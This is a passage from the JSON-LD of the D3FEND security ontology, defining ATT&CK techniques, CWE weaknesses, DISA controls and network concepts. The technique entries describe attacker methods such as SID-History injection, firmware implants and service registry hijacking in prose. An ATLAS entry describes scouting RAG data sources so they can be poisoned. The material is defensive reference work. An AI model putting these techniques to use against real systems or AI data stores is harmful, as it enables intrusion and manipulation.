      "@id": "_:Nca4675329777460d9b50052714dd7024",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0042"
      }
    },
    {
      "@id": "d3f:NetworkService",
      "@type": "owl:Class",
      "d3f:definition": "In computer networking, a network service is an application running at the network application layer and above, that provides data storage, manipulation, presentation, communication or other capability which is often implemented using a client-server or peer-to-peer architecture based on application layer network protocols. Clients and servers will often have a user interface, and sometimes other hardware associated with it.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Network_service"
      },
      "rdfs:label": "Network Service",
      "rdfs:subClassOf": {
        "@id": "d3f:ServiceApplicationProcess"
      }
    },
    {
      "@id": "d3f:CWE-1114",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1114",
      "d3f:definition": "The source code contains whitespace that is inconsistent across the code or does not follow expected standards for the product.",
      "rdfs:label": "Inappropriate Whitespace Style",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:HTTPHeadEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP HEAD method is used to request metadata about the specified resource without the response body.",
      "rdfs:label": "HTTP HEAD Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:AuthorizationLog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A log of authorization events.",
      "d3f:records": {
        "@id": "d3f:NetworkResourceAccess"
      },
      "rdfs:label": "Authorization Log",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Authorization"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00155053-n"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EventLog"
        },
        {
          "@id": "_:N53685ad9e72841939e1dfe4a282c2ed6"
        }
      ]
    },
    {
      "@id": "_:N53685ad9e72841939e1dfe4a282c2ed6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:records"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResourceAccess"
      }
    },
    {
      "@id": "d3f:CWE-5",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-5",
      "d3f:definition": "Information sent over a network can be compromised while in transit. An attacker may be able to read or modify the contents if the data are sent in plaintext or are weakly encrypted.",
      "rdfs:label": "J2EE Misconfiguration: Data Transmission Without Encryption",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-319"
      }
    },
    {
      "@id": "d3f:T1134.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1134.005",
      "d3f:definition": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).",
      "d3f:modifies": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "rdfs:label": "SID-History Injection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1134"
        },
        {
          "@id": "_:N33fea15901204c56b15ac9a470ba5067"
        }
      ]
    },
    {
      "@id": "_:N33fea15901204c56b15ac9a470ba5067",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:CWE-582",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-582",
      "d3f:definition": "The product declares an array public, final, and static, which is not sufficient to prevent the array's contents from being modified.",
      "rdfs:label": "Array Declared Public, Final, and Static",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:NetworkNodeInventory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkNodeInventory"
      ],
      "d3f:d3fend-id": "D3-NNI",
      "d3f:definition": "Network node inventorying identifies and records all the network nodes (hosts, routers, switches, firewalls, etc.) in the organization's architecture.",
      "d3f:inventories": {
        "@id": "d3f:NetworkNode"
      },
      "d3f:kb-article": "## How it works\nAdministrators collect information on network nodes in their architecture using a variety of administrative and management tools that query network devices and nodes for information.  In some cases, where such queries are not supported or provide specific information of interest, an administrator may also collect this information through network enumeration methods to include host discovery and scanning for active ports and services.\n\n## Considerations\n* Scanning and probing techniques using mapping tools can result in side effects to information technology (IT) and operational technology (OT) systems.\n* An adversary conducting network enumeration may engage in activities that parallel normal network node inventorying activities, but would require escalating to admin privileges for most of the operations requiring administrative tools\n\n## Examples\n* Link-layer discovery\n   * Link-layer Discovery Protocol (LLDP)\n   * Cisco Discovery Protocol (CDP)\n* Application-layer discovery\n   * Simple Network Management Protocol (SNMP) collects MIB information\n   * Web-based Enterprise Management (WBEM) collects CIM information\n      * Windows Management Instrumentation (WMI)\n      * Windows Management Infrastructure (MI)",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-IEEE-802_1AB-2016"
        },
        {
          "@id": "d3f:Reference-QualysNetworkPassiveSensorGettingStartedGuide"
        },
        {
          "@id": "d3f:Reference-RFC3411-AnArchitectureForDescribingSimpleNetworkManagementProtocolSNMPManagementFrameworks"
        },
        {
          "@id": "d3f:Reference-Web-BasedEnterpriseManagement"
        },
        {
          "@id": "d3f:Reference-Windows-Management-Infrastructure"
        },
        {
          "@id": "d3f:Reference-Windows-Management-Instrumentation"
        }
      ],
      "d3f:synonym": [
        "System Discovery",
        "System Inventorying"
      ],
      "rdfs:label": "Network Node Inventory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AssetInventory"
        },
        {
          "@id": "_:Na4b316d403924441a687bc4540da34dc"
        }
      ]
    },
    {
      "@id": "_:Na4b316d403924441a687bc4540da34dc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:inventories"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkNode"
      }
    },
    {
      "@id": "d3f:CWE-1043",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1043",
      "d3f:definition": "The product uses a data element that has an excessively large number of sub-elements with non-primitive data types such as structures or aggregated objects.",
      "rdfs:label": "Data Element Aggregating an Excessively Large Number of Non-Primitive Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1093"
      }
    },
    {
      "@id": "d3f:CCI-002307_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:SystemConfigurationPermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides authorized individuals the capability to define or change the value of security attributes available for association with subjects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002307"
    },
    {
      "@id": "d3f:WirelessRouter",
      "@type": "owl:Class",
      "d3f:definition": "A wireless router is a device that performs the functions of a router and also includes the functions of a wireless access point. It is used to provide access to the Internet or a private computer network. Depending on the manufacturer and model, it can function in a wired local area network, in a wireless-only LAN, or in a mixed wired and wireless network.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Wireless_router"
      },
      "rdfs:label": "Wireless Router",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Router"
        },
        {
          "@id": "d3f:WirelessAccessPoint"
        }
      ]
    },
    {
      "@id": "d3f:T1520",
      "@type": "owl:Class",
      "d3f:attack-id": "T1520",
      "d3f:definition": "Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1520) (DGAs) to procedurally generate domain names for command and control communication, and other uses such as malicious application distribution.(Citation: securelist rotexy 2018)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1637.001",
      "rdfs:label": "Domain Generation Algorithms - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1637.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Domain Generation Algorithms"
    },
    {
      "@id": "d3f:T1600.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1600.002",
      "d3f:definition": "Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.",
      "rdfs:label": "Disable Crypto Hardware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1600"
      }
    },
    {
      "@id": "d3f:CCI-002684_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:PlatformMonitoring"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system audits and/or alerts organization-defined personnel when unauthorized network services are detected.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002684"
    },
    {
      "@id": "d3f:CCI-002381_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:Hardware-basedProcessIsolation"
        },
        {
          "@id": "d3f:Kernel-basedProcessIsolation"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization minimizes the number of nonsecurity functions included within the isolation boundary containing security functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002381"
    },
    {
      "@id": "d3f:ReconnaissanceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to gather information they can use to plan future operations.",
      "d3f:enables": {
        "@id": "d3f:TA0043"
      },
      "rdfs:label": "Reconnaissance Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N44407d5758244da7b85cd3460f7c822f"
        }
      ]
    },
    {
      "@id": "_:N44407d5758244da7b85cd3460f7c822f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0043"
      }
    },
    {
      "@id": "d3f:T1521.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1521.002",
      "d3f:definition": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private that should not be distributed. Due to how asymmetric algorithms work, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA, ElGamal, and ECDSA.",
      "rdfs:label": "Asymmetric Cryptography - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1521"
      },
      "skos:prefLabel": "Asymmetric Cryptography"
    },
    {
      "@id": "d3f:ExpectedErrorReduction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EER",
      "d3f:definition": "Expected Error Reduction (EER) follows similar ideas as EMC, but again looks at the model output instead of the model itself and also takes the other data into account. In particular, a sample x is considered useful if we can expect that knowing the label will reduce the future error on unseen samples.",
      "d3f:kb-article": "## References\nIntro to Active Learning. inovex Blog.  [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).",
      "rdfs:label": "Expected Error Reduction",
      "rdfs:subClassOf": {
        "@id": "d3f:ActiveLearning"
      }
    },
    {
      "@id": "d3f:OTWatchdogTimer",
      "@type": "owl:Class",
      "d3f:definition": "An OT Watchdog Timer is a software-based monitoring mechanism used in operational technology (OT) environments to continuously supervise the execution and responsiveness of critical control applications, devices, or communication links. It operates by requiring periodic “heartbeat” signals or status updates from monitored processes within a defined time window; if these signals are not received on time (indicating a hang, fault, or abnormal delay) the OT Watchdog Timer automatically triggers predefined safety or recovery actions, such as placing equipment in a fail-safe state, restarting services, generating alarms, or initiating controlled shutdowns.",
      "rdfs:label": "OT Watchdog Timer",
      "rdfs:seeAlso": {
        "@id": "https://literature.rockwellautomation.com/idc/groups/literature/documents/pm/1756-pm005_-en-p.pdf"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTProcessVariable"
        },
        {
          "@id": "d3f:SoftwareWatchdogTimer"
        }
      ]
    },
    {
      "@id": "d3f:T1542.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1542.004",
      "d3f:definition": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)",
      "d3f:modifies": {
        "@id": "d3f:SystemFirmware"
      },
      "rdfs:label": "ROMMONkit",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1542"
        },
        {
          "@id": "_:N6c2a709b3cc84a6984fb9fcaa65d8671"
        }
      ]
    },
    {
      "@id": "_:N6c2a709b3cc84a6984fb9fcaa65d8671",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirmware"
      }
    },
    {
      "@id": "d3f:CWE-525",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-525",
      "d3f:definition": "The web application does not use an appropriate caching policy that specifies the extent to which each web page and associated form fields should be cached.",
      "rdfs:label": "Use of Web Browser Cache Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-524"
      }
    },
    {
      "@id": "d3f:corrupts",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x corrupts y: The entity x causes y to enter an incorrect, inconsistent, or unintended state by modifying y's information-bearing content (e.g., a bit, symbol, word, configuration cell, or stored parameter) such that y's value no longer matches the expected or previously valid value.",
      "rdfs:label": "corrupts",
      "rdfs:subPropertyOf": {
        "@id": "d3f:impairs"
      }
    },
    {
      "@id": "d3f:CWE-1318",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1318",
      "d3f:definition": "On-chip fabrics or buses either do not support or are not configured to support privilege separation or other security features, such as access control.",
      "rdfs:label": "Missing Support for Security Features in On-chip Fabrics or Buses",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CreateThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:creates": {
        "@id": "d3f:Thread"
      },
      "d3f:definition": "Threads are an execution model that exists independently from a language, as well as a parallel execution model. They enable a program to control multiple different flows of work that overlap in time.",
      "rdfs:label": "Create Thread",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:POSIX_Threads"
        },
        {
          "@id": "https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N28bf6a94d54d48298d006d697fb20b63"
        }
      ]
    },
    {
      "@id": "_:N28bf6a94d54d48298d006d697fb20b63",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "d3f:OTSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OT Sensor is an industrial-grade sensing device engineered for operational technology (OT) environments (e.g. SCADA, ICS). It measures physical variables—such as pressure, temperature, or flow—under demanding conditions, converting them into reliable signals for real-time monitoring and process control loops.",
      "d3f:may-contain": {
        "@id": "d3f:ClientComputer"
      },
      "d3f:writes": {
        "@id": "d3f:OTProcessVariable"
      },
      "rdfs:comment": "Components of the sensor include a sensing element and may include a power source, display, housing, communication interface or signal processor.",
      "rdfs:isDefinedBy": {
        "@id": "https://csrc.nist.rip/glossary/term/sensor"
      },
      "rdfs:label": "OT Sensor",
      "rdfs:seeAlso": [
        {
          "@id": "https://emerson.com/en-us/catalog/rosemount-sku-3051-coplanar-pressure-transmitter"
        },
        {
          "@id": "https://www.emerson.com/en-us/catalog/rosemount-sku-708-wireless-acoustic-transmitter"
        },
        {
          "@id": "https://www.omega.com/en-us/pressure-measurement/pressure-gauges/c/analog-pressure-gauges"
        },
        {
          "@id": "https://www.vega.com/en-us/products/product-catalog/level/radar"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:Sensor"
        },
        {
          "@id": "_:N834437836c554719a917a82a12a6e389"
        },
        {
          "@id": "_:N6bb6b140111f40f59fb2c7e794b6e857"
        }
      ]
    },
    {
      "@id": "_:N834437836c554719a917a82a12a6e389",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ClientComputer"
      }
    },
    {
      "@id": "_:N6bb6b140111f40f59fb2c7e794b6e857",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:writes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProcessVariable"
      }
    },
    {
      "@id": "d3f:CWE-110",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-110",
      "d3f:definition": "Validation fields that do not appear in forms they are associated with indicate that the validation logic is out of date.",
      "rdfs:label": "Struts: Validator Without Form Field",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1164"
      }
    },
    {
      "@id": "d3f:CWE-1282",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1282",
      "d3f:definition": "Immutable data, such as a first-stage bootloader, device identifiers, and \"write-once\" configuration settings are stored in writable memory that can be re-programmed or updated in the field.",
      "rdfs:label": "Assumed-Immutable Data is Stored in Writable Memory",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:T1496.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1496.002",
      "d3f:definition": "Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.",
      "rdfs:label": "Bandwidth Hijacking",
      "rdfs:subClassOf": {
        "@id": "d3f:T1496"
      }
    },
    {
      "@id": "d3f:T1185",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1185",
      "d3f:definition": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)",
      "d3f:produces": {
        "@id": "d3f:WebNetworkTraffic"
      },
      "rdfs:label": "Browser Session Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N89346b9b3ee842019c032cab2907a1b2"
        }
      ]
    },
    {
      "@id": "_:N89346b9b3ee842019c032cab2907a1b2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-430",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-430",
      "d3f:definition": "The wrong \"handler\" is assigned to process an object.",
      "rdfs:label": "Deployment of Wrong Handler",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:T1608",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608",
      "d3f:definition": "Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)",
      "rdfs:label": "Stage Capabilities",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:ApplicationRuntimeVariable",
      "@type": "owl:Class",
      "d3f:definition": "A system variable that tracks aspects of runtime of a system.",
      "rdfs:label": "Application Runtime Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:RuntimeVariable"
      }
    },
    {
      "@id": "d3f:WindowsVirtualFree",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Releases, decommits, or releases and decommits a region of pages within the virtual address space of the calling process.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtFreeVirtualMemory"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfree"
      },
      "rdfs:label": "Windows VirtualFree",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIFreeMemory"
        },
        {
          "@id": "_:N84210b8a49ce483e974e9734cabb13ac"
        }
      ]
    },
    {
      "@id": "_:N84210b8a49ce483e974e9734cabb13ac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtFreeVirtualMemory"
      }
    },
    {
      "@id": "d3f:reads",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x reads y: The subject x takes the action of reading from a digital source y to acquire data and placing it into volatile memory for processing.",
      "rdfs:label": "reads",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Reading_(computer)"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00629157-v"
        }
      ],
      "rdfs:subPropertyOf": {
        "@id": "d3f:accesses"
      }
    },
    {
      "@id": "d3f:AML.T0064",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0064",
      "d3f:definition": "Adversaries may identify data sources used in retrieval augmented generation (RAG) systems for targeting purposes. By pinpointing these sources, attackers can focus on poisoning or otherwise manipulating the external data repositories the AI relies on.\n\nRAG-indexed data may be identified in public documentation about the system, or by interacting with the system directly and observing any indications of or references to external data sources.",
      "rdfs:label": "Gather RAG-Indexed Targets - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0064"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather RAG-Indexed Targets"
    },
    {
      "@id": "d3f:CCI-002346_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DatabaseQueryStringAnalysis"
        },
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs organization-defined data mining prevention techniques for organization-defined data storage objects to adequately protect against data mining.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-25T00:00:00"
      },
      "rdfs:label": "CCI-002346"
    },
    {
      "@id": "d3f:Reference-CAR-2021-02-001%3AWebshell-IndicativeProcessTree_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-02-001/"
      },
      "d3f:kb-abstract": "A web shell is a web script placed on an openly accessible web server to allow an adversary to use the server as a gateway in a network. As the shell operates, commands will be issued from within the web application into the broader server operating system. This analytic looks for host enumeration executables initiated by any web service that would not normally be executed within that environment.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-02-001: Webshell-Indicative Process Tree",
      "rdfs:label": "Reference - CAR-2021-02-001: Webshell-Indicative Process Tree - MITRE"
    },
    {
      "@id": "d3f:CCI-002015_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system accepts Personal Identity Verification-I (PIV-I) credentials.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-002015"
    },
    {
      "@id": "d3f:REC-0005.04",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0005.04",
      "d3f:definition": "Active scanning moves beyond passive collection: an adversary transmits or injects probes intended to elicit identifiable responses that reveal frequencies, protocols, or device behavior. Examples include stimulating auto-track or auto-reply beacons, provoking ranging responses, tickling access schemes (TDMA/FDMA bursts), or sending benign-looking frames to observe AGC, saturation, or error counters. Optical/lasercom analogs include alignment pings or modulation patterns that solicit acquisition messages. The objective is RF “banner grabbing”, learning enough to build compatible demod/decoder chains or to map control surfaces, without necessarily breaching authentication. Because scans can resemble normal acquisition attempts, they may blend into the noise floor of operations.",
      "rdfs:label": "Active Scanning (RF/Optical) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0005/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0005"
      },
      "skos:prefLabel": "Active Scanning (RF/Optical)"
    },
    {
      "@id": "d3f:T1574.011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.011",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\\SYSTEM\\CurrentControlSet\\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationInitDatabaseRecord"
      },
      "rdfs:label": "Services Registry Permissions Weakness",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:Nfb9fbf9ef0b64d9593a61243c7cf17d4"
        }
      ]
    },
    {
      "@id": "_:Nfb9fbf9ef0b64d9593a61243c7cf17d4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationInitDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CWE-364",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-364",
      "d3f:definition": "The product uses a signal handler that introduces a race condition.",
      "rdfs:label": "Signal Handler Race Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:Non-monotonicLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-NML",
      "d3f:definition": "Non-monotonic logic is a formal logic whose conclusion relation is not monotonic. In other words, non-monotonic logics are devised to capture and represent defeasible inferences (cf. defeasible reasoning), i.e., a kind of inference in which reasoners draw tentative conclusions, enabling reasoners to retract their conclusion(s) based on further evidence.",
      "d3f:kb-article": "## References\n1. Non-monotonic logic. (2023, June 1). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Non-monotonic_logic)",
      "rdfs:label": "Non-monotonic Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:T0869",
      "@type": "owl:Class",
      "d3f:attack-id": "T0869",
      "d3f:definition": "Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port.  Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.",
      "rdfs:label": "Standard Application Layer Protocol - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCommandAndControlTechnique"
      },
      "skos:prefLabel": "Standard Application Layer Protocol"
    },
    {
      "@id": "d3f:AML.T0094",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0094",
